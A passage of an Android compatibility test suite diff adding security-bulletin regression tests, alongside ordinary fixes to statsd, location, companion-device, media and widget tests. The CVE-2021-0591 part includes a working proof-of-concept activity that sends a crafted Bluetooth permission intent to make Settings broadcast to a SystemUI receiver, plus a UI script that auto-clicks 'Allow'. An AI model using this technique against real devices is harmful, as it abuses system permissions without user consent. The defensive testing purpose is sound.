+import android.platform.test.annotations.AppModeFull;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.platform.test.annotations.RequiresDevice;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
+import java.util.regex.Pattern;
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static org.hamcrest.core.Is.is;
+import static org.junit.Assert.assertThat;
+import static org.junit.Assume.assumeTrue;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0591 extends BaseHostJUnit4Test {
+
+    private static final String TEST_PKG = "android.security.cts.CVE_2021_0591";
+    private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+    private static final String TEST_APP = "CVE-2021-0591.apk";
+
+    @Before
+    public void setUp() throws Exception {
+        uninstallPackage(getDevice(), TEST_PKG);
+    }
+
+    /**
+     * b/179386960
+     */
+    @AppModeFull
+    @AsbSecurityTest(cveBugId = 179386960)
+    @Test
+    public void testPocCVE_2021_0591() throws Exception {
+        ITestDevice device = getDevice();
+
+        assumeTrue("Bluetooth is not available on device",
+                device.hasFeature("android.hardware.bluetooth"));
+
+        /* Clear the logs in the beginning */
+        AdbUtils.runCommandLine("logcat -c", device);
+        installPackage();
+        try {
+            runDeviceTests(TEST_PKG, TEST_CLASS, "testClick");
+        } catch (AssertionError error) {
+            /* runDeviceTests crashed, do not continue */
+            error.printStackTrace();
+            return;
+        }
+        String screenshotServiceErrorReceiver =
+                "com.android.systemui.screenshot.ScreenshotServiceErrorReceiver";
+        String logcat =
+                AdbUtils.runCommandLine("logcat -d BluetoothPermissionActivity *:S", device);
+        Pattern pattern = Pattern.compile(screenshotServiceErrorReceiver, Pattern.MULTILINE);
+        String message = "Device is vulnerable to b/179386960 "
+                + "hence it is possible to sent a broadcast intent to "
+                + screenshotServiceErrorReceiver;
+        assertThat(message, pattern.matcher(logcat).find(), is(false));
+    }
+
+    private void installPackage() throws Exception {
+        installPackage(TEST_APP, new String[0]);
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java
new file mode 100644
index 00000000000..0562b49b756
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0596.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.runner.RunWith;
+import org.junit.Test;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0596 extends SecurityTestCase {
+
+    /**
+     * b/181346550
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @AsbSecurityTest(cveBugId = 181346550)
+    @Test
+    public void testPocCVE_2021_0596() throws Exception {
+        AdbUtils.assumeHasNfc(getDevice());
+        pocPusher.only64();
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0596", null, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/Android.bp
new file mode 100644
index 00000000000..4afdb32662c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/Android.bp
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+android_test_helper_app {
+    name: "CVE-2021-0591",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: ["src/**/*.java"],
+    test_suites: [
+        "cts",
+        "vts10",
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+    ],
+    sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/AndroidManifest.xml
new file mode 100644
index 00000000000..8e33f0a8539
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2021 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2021_0591"
+    android:versionCode="1"
+    android:versionName="1.0">
+    <uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
+    <application
+        android:allowBackup="true"
+        android:label="CVE-2021-0591"
+        android:supportsRtl="true">
+
+        <activity android:name=".PocActivity" android:exported="true">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN" />
+                <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+        </activity>
+    </application>
+
+  <instrumentation
+    android:name="androidx.test.runner.AndroidJUnitRunner"
+    android:targetPackage="android.security.cts.CVE_2021_0591" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/res/layout/activity_main.xml
new file mode 100644
index 00000000000..a85bec90a5a
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/res/layout/activity_main.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2021 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+<LinearLayout
+    xmlns:android="http://schemas.android.com/apk/res/android"
+        android:orientation="vertical"
+        android:layout_width="match_parent"
+        android:layout_height="match_parent">
+    <View
+        android:id="@+id/drawableview"
+        android:layout_width="match_parent"
+        android:layout_height="300dp" />
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/DeviceTest.java
new file mode 100644
index 00000000000..0ca91d80d0f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/DeviceTest.java
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0591;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.os.SystemClock;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+import java.util.List;
+import org.junit.Before;
+import org.junit.After;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import static org.hamcrest.CoreMatchers.notNullValue;
+import static org.junit.Assert.assertThat;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    private static final String BASIC_SAMPLE_PACKAGE =
+        "android.security.cts.CVE_2021_0591";
+    private static final int LAUNCH_TIMEOUT_MS = 20000;
+    private UiDevice mDevice;
+
+    @Before
+    public void startMainActivityFromHomeScreen() {
+        mDevice = UiDevice.getInstance(getInstrumentation());
+        try {
+            mDevice.wakeUp();
+            mDevice.pressMenu();
+            mDevice.pressHome();
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+        Context context = getApplicationContext();
+        assertThat(context, notNullValue());
+        PackageManager packageManager = context.getPackageManager();
+        assertThat(packageManager, notNullValue());
+        final Intent intent = packageManager.getLaunchIntentForPackage(BASIC_SAMPLE_PACKAGE);
+        assertThat(intent, notNullValue());
+        intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+        context.startActivity(intent);
+        mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS);
+    }
+
+    @After
+    public void lastOperation() {
+        SystemClock.sleep(20000);
+    }
+
+    @Test
+    public void testClick() {
+        List<UiObject2> objects;
+        BySelector selector = By.clickable(true);
+        String button;
+        objects = mDevice.findObjects(selector);
+        for (UiObject2 o : objects) {
+            button = o.getText();
+            if (button == null) {
+                continue;
+            }
+            if (button.matches("ALLOW|YES|Allow|Yes")) {
+                o.click();
+                return;
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/PocActivity.java
new file mode 100644
index 00000000000..e1a12f944b4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0591/src/android/security/cts/CVE_2021_0591/PocActivity.java
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0591;
+
+import android.app.Activity;
+import android.bluetooth.BluetoothAdapter;
+import android.bluetooth.BluetoothDevice;
+import android.content.Intent;
+import android.os.Bundle;
+
+import static org.junit.Assert.assertNotNull;
+
+public class PocActivity extends Activity {
+
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        super.onCreate(savedInstanceState);
+        setContentView(R.layout.activity_main);
+        Intent i = new Intent("android.bluetooth.device.action.CONNECTION_ACCESS_REQUEST");
+        i.setClassName("com.android.settings",
+                "com.android.settings.bluetooth.BluetoothPermissionActivity");
+        BluetoothAdapter bluetoothAdapter = BluetoothAdapter.getDefaultAdapter();
+        assertNotNull(bluetoothAdapter);
+        i.putExtra(BluetoothDevice.EXTRA_DEVICE,
+                bluetoothAdapter.getRemoteDevice("00:11:22:33:AA:BB"));
+        i.putExtra("android.bluetooth.device.extra.PACKAGE_NAME", "com.android.systemui");
+        i.putExtra("android.bluetooth.device.extra.CLASS_NAME",
+                "com.android.systemui.screenshot.ScreenshotServiceErrorReceiver");
+        startActivity(i);
+    }
+}
diff --git a/hostsidetests/statsdatom/src/android/cts/statsdatom/statsd/HostAtomTests.java b/hostsidetests/statsdatom/src/android/cts/statsdatom/statsd/HostAtomTests.java
index ad925131cf0..d9072497cbf 100644
--- a/hostsidetests/statsdatom/src/android/cts/statsdatom/statsd/HostAtomTests.java
+++ b/hostsidetests/statsdatom/src/android/cts/statsdatom/statsd/HostAtomTests.java
@@ -229,14 +229,19 @@ public class HostAtomTests extends DeviceTestCase implements IBuildReceiver {
 
         // Trigger events in same order.
         DeviceUtils.plugInAc(getDevice());
+        DeviceUtils.flushBatteryStatsHandlers(getDevice());
         Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
         DeviceUtils.unplugDevice(getDevice());
+        DeviceUtils.flushBatteryStatsHandlers(getDevice());
         Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
         plugInUsb();
+        DeviceUtils.flushBatteryStatsHandlers(getDevice());
         Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
         DeviceUtils.unplugDevice(getDevice());
+        DeviceUtils.flushBatteryStatsHandlers(getDevice());
         Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
         plugInWireless();
+        DeviceUtils.flushBatteryStatsHandlers(getDevice());
         Thread.sleep(AtomTestUtils.WAIT_TIME_LONG);
         DeviceUtils.unplugDevice(getDevice());
         DeviceUtils.flushBatteryStatsHandlers(getDevice());
diff --git a/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java b/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java
index dcaee4fb7bf..1be37c3df22 100644
--- a/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java
+++ b/tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java
@@ -18,6 +18,7 @@ package android.location.cts.fine;
 
 import static android.Manifest.permission.WRITE_SECURE_SETTINGS;
 import static android.content.pm.PackageManager.FEATURE_AUTOMOTIVE;
+import static android.content.pm.PackageManager.FEATURE_TELEVISION;
 import static android.location.LocationManager.EXTRA_PROVIDER_ENABLED;
 import static android.location.LocationManager.EXTRA_PROVIDER_NAME;
 import static android.location.LocationManager.FUSED_PROVIDER;
@@ -264,8 +265,6 @@ public class LocationManagerFineTest {
 
     @Test
     public void testGetCurrentLocation_Timeout() throws Exception {
-        Location loc = createLocation(TEST_PROVIDER, mRandom);
-
         try (GetCurrentLocationCapture capture = new GetCurrentLocationCapture()) {
             mManager.getCurrentLocation(
                     TEST_PROVIDER,
@@ -665,8 +664,9 @@ public class LocationManagerFineTest {
 
     @Test
     public void testRequestLocationUpdates_BatterySaver_GpsDisabledScreenOff() throws Exception {
-        // battery saver is unsupported on auto
+        // battery saver is unsupported on auto and tv
         assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_AUTOMOTIVE));
+        assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_TELEVISION));
 
         PowerManager powerManager = Objects.requireNonNull(
                 mContext.getSystemService(PowerManager.class));
@@ -725,8 +725,9 @@ public class LocationManagerFineTest {
 
     @Test
     public void testRequestLocationUpdates_BatterySaver_AllDisabledScreenOff() throws Exception {
-        // battery saver is unsupported on auto
+        // battery saver is unsupported on auto and tv
         assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_AUTOMOTIVE));
+        assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_TELEVISION));
 
         PowerManager powerManager = Objects.requireNonNull(
                 mContext.getSystemService(PowerManager.class));
@@ -766,8 +767,9 @@ public class LocationManagerFineTest {
 
     @Test
     public void testRequestLocationUpdates_BatterySaver_ThrottleScreenOff() throws Exception {
-        // battery saver is unsupported on auto
+        // battery saver is unsupported on auto and tv
         assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_AUTOMOTIVE));
+        assumeFalse(mContext.getPackageManager().hasSystemFeature(FEATURE_TELEVISION));
 
         PowerManager powerManager = Objects.requireNonNull(
                 mContext.getSystemService(PowerManager.class));
@@ -1007,7 +1009,7 @@ public class LocationManagerFineTest {
 
     @Test
     public void testRequestFlush_Gnss() throws Exception {
-        assumeTrue(mManager.getAllProviders().contains(GPS_PROVIDER));
+        assumeTrue(mManager.hasProvider(GPS_PROVIDER));
 
         try (LocationListenerCapture capture = new LocationListenerCapture(mContext)) {
             mManager.requestLocationUpdates(GPS_PROVIDER, 0, 0,
diff --git a/tests/tests/os/src/android/os/cts/CompanionDeviceManagerTest.kt b/tests/tests/os/src/android/os/cts/CompanionDeviceManagerTest.kt
index bfb82c5a3e1..6869889e68b 100644
--- a/tests/tests/os/src/android/os/cts/CompanionDeviceManagerTest.kt
+++ b/tests/tests/os/src/android/os/cts/CompanionDeviceManagerTest.kt
@@ -17,6 +17,7 @@
 package android.os.cts
 
 import android.companion.CompanionDeviceManager
+import android.content.pm.PackageManager
 import android.content.pm.PackageManager.FEATURE_AUTOMOTIVE
 import android.content.pm.PackageManager.FEATURE_COMPANION_DEVICE_SETUP
 import android.content.pm.PackageManager.PERMISSION_GRANTED
@@ -68,6 +69,8 @@ const val COMPANION_APPROVE_WIFI_CONNECTIONS =
 const val DUMMY_MAC_ADDRESS = "00:00:00:00:00:10"
 const val MANAGE_COMPANION_DEVICES = "android.permission.MANAGE_COMPANION_DEVICES"
 const val SHELL_PACKAGE_NAME = "com.android.shell"
+const val TEST_APP_PACKAGE_NAME = "android.os.cts.companiontestapp"
+const val TEST_APP_APK_LOCATION = "/data/local/tmp/cts/os/CtsCompanionTestApp.apk"
 val InstrumentationTestCase.context get() = InstrumentationRegistry.getTargetContext()
 
 /**
@@ -79,6 +82,11 @@ class CompanionDeviceManagerTest : InstrumentationTestCase() {
     val cdm: CompanionDeviceManager by lazy {
         context.getSystemService(CompanionDeviceManager::class.java)
     }
+    val pm: PackageManager by lazy { context.packageManager }
+    private val hasFeatureCompanionDeviceSetup: Boolean by lazy {
+        pm.hasSystemFeature(FEATURE_COMPANION_DEVICE_SETUP)
+    }
+    private val isAuto: Boolean by lazy { pm.hasSystemFeature(FEATURE_AUTOMOTIVE) }
 
     private fun isShellAssociated(macAddress: String, packageName: String): Boolean {
         val userId = context.userId
@@ -102,19 +110,24 @@ class CompanionDeviceManagerTest : InstrumentationTestCase() {
 
     @Before
     fun assumeHasFeature() {
-        assumeTrue(context.packageManager.hasSystemFeature(FEATURE_COMPANION_DEVICE_SETUP))
+        assumeTrue(hasFeatureCompanionDeviceSetup)
         // TODO(b/191699828) test does not work in automotive due to accessibility issue
-        assumeFalse(context.packageManager.hasSystemFeature(FEATURE_AUTOMOTIVE))
+        assumeFalse(isAuto)
     }
 
     @After
     fun removeAllAssociations() {
-        val packageName = "android.os.cts.companiontestapp"
+        // If the devices does not have the feature or is an Auto, the test didn't run, and the
+        // clean up is not needed (will actually crash if the feature is missing).
+        // See assumeHasFeature @Before method.
+        if (!hasFeatureCompanionDeviceSetup || isAuto) return
+
         val userId = context.userId
-        val associations = getAssociatedDevices(packageName)
+        val associations = getAssociatedDevices(TEST_APP_PACKAGE_NAME)
 
         for (address in associations) {
-            runShellCommandOrThrow("cmd companiondevice disassociate $userId $packageName $address")
+            runShellCommandOrThrow(
+                    "cmd companiondevice disassociate $userId $TEST_APP_PACKAGE_NAME $address")
         }
     }
 
@@ -168,10 +181,8 @@ class CompanionDeviceManagerTest : InstrumentationTestCase() {
     @AppModeFull(reason = "Companion API for non-instant apps only")
     @Test
     fun testProfiles() {
-        val packageName = "android.os.cts.companiontestapp"
-        installApk(
-                "--user ${UserHandle.myUserId()} /data/local/tmp/cts/os/CtsCompanionTestApp.apk")
-        startApp(packageName)
+        installApk("--user ${UserHandle.myUserId()} $TEST_APP_APK_LOCATION")
+        startApp(TEST_APP_PACKAGE_NAME)
 
         waitFindNode(hasClassThat(`is`(equalTo(EditText::class.java.name))))
                 .performAction(ACTION_SET_TEXT,
@@ -191,24 +202,24 @@ class CompanionDeviceManagerTest : InstrumentationTestCase() {
         device!!.click()
 
         eventually {
-            assertThat(getAssociatedDevices(packageName), not(empty()))
+            assertThat(getAssociatedDevices(TEST_APP_PACKAGE_NAME), not(empty()))
         }
-        val deviceAddress = getAssociatedDevices(packageName).last()
+        val deviceAddress = getAssociatedDevices(TEST_APP_PACKAGE_NAME).last()
 
         runShellCommandOrThrow("cmd companiondevice simulate_connect $deviceAddress")
-        assertPermission(packageName, "android.permission.CALL_PHONE", PERMISSION_GRANTED)
+        assertPermission(
+                TEST_APP_PACKAGE_NAME, "android.permission.CALL_PHONE", PERMISSION_GRANTED)
 
         runShellCommandOrThrow("cmd companiondevice simulate_disconnect $deviceAddress")
-        assertPermission(packageName, "android.permission.CALL_PHONE", PERMISSION_GRANTED)
+        assertPermission(
+                TEST_APP_PACKAGE_NAME, "android.permission.CALL_PHONE", PERMISSION_GRANTED)
     }
 
     @AppModeFull(reason = "Companion API for non-instant apps only")
     @Test
     fun testRequestNotifications() {
-        val packageName = "android.os.cts.companiontestapp"
-        installApk(
-                "--user ${UserHandle.myUserId()} /data/local/tmp/cts/os/CtsCompanionTestApp.apk")
-        startApp(packageName)
+        installApk("--user ${UserHandle.myUserId()} $TEST_APP_APK_LOCATION")
+        startApp(TEST_APP_PACKAGE_NAME)
 
         waitFindNode(hasClassThat(`is`(equalTo(EditText::class.java.name))))
                 .performAction(ACTION_SET_TEXT,
diff --git a/tests/tests/provider/preconditions/Android.bp b/tests/tests/provider/preconditions/Android.bp
index 289aab5b1ea..f636464db68 100644
--- a/tests/tests/provider/preconditions/Android.bp
+++ b/tests/tests/provider/preconditions/Android.bp
@@ -14,7 +14,8 @@ java_test_helper_library {
     test_suites: [
         "cts",
         "general-tests",
-        "sts"
+        "sts",
+        "mts"
     ],
     host_supported: true,
     device_supported: false,
diff --git a/tests/tests/provider/src/android/provider/cts/media/MediaStoreTest.java b/tests/tests/provider/src/android/provider/cts/media/MediaStoreTest.java
index ed33af85f11..baeca9ceea6 100644
--- a/tests/tests/provider/src/android/provider/cts/media/MediaStoreTest.java
+++ b/tests/tests/provider/src/android/provider/cts/media/MediaStoreTest.java
@@ -266,6 +266,7 @@ public class MediaStoreTest {
     }
 
     @Test
+    @SdkSuppress(minSdkVersion = 31, codeName = "S")
     public void testCanManageMedia() throws Exception {
         final String opString = AppOpsManager.permissionToOp(Manifest.permission.MANAGE_MEDIA);
 
diff --git a/tests/tests/widget/src/android/widget/cts/RadioButtonTest.java b/tests/tests/widget/src/android/widget/cts/RadioButtonTest.java
index 72cff7f307f..67a12a00152 100644
--- a/tests/tests/widget/src/android/widget/cts/RadioButtonTest.java
+++ b/tests/tests/widget/src/android/widget/cts/RadioButtonTest.java
@@ -19,6 +19,7 @@ package android.widget.cts;
 import static org.junit.Assert.assertFalse;
 import static org.junit.Assert.assertTrue;
 import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.timeout;
 import static org.mockito.Mockito.times;
 import static org.mockito.Mockito.verify;
 import static org.mockito.Mockito.verifyNoMoreInteractions;
@@ -160,7 +161,7 @@ public class RadioButtonTest {
     }
 
     @Test
-    public void testToggleViaEmulatedTap() {
+    public void testToggleViaEmulatedTap() throws Throwable {
         final RadioButton.OnCheckedChangeListener mockCheckedChangeListener =
                 mock(RadioButton.OnCheckedChangeListener.class);
         mRadioButton.setOnCheckedChangeListener(mockCheckedChangeListener);
@@ -170,7 +171,8 @@ public class RadioButtonTest {
 
         // tap to checked
         CtsTouchUtils.emulateTapOnViewCenter(mInstrumentation, mActivityRule, mRadioButton);
-        verify(mockCheckedChangeListener, times(1)).onCheckedChanged(mRadioButton, true);
+        // wait for the posted onClick() after the tap
+        verify(mockCheckedChangeListener, timeout(5000)).onCheckedChanged(mRadioButton, true);
         assertTrue(mRadioButton.isChecked());
 
         // tap to not checked - this should leave the radio button in checked state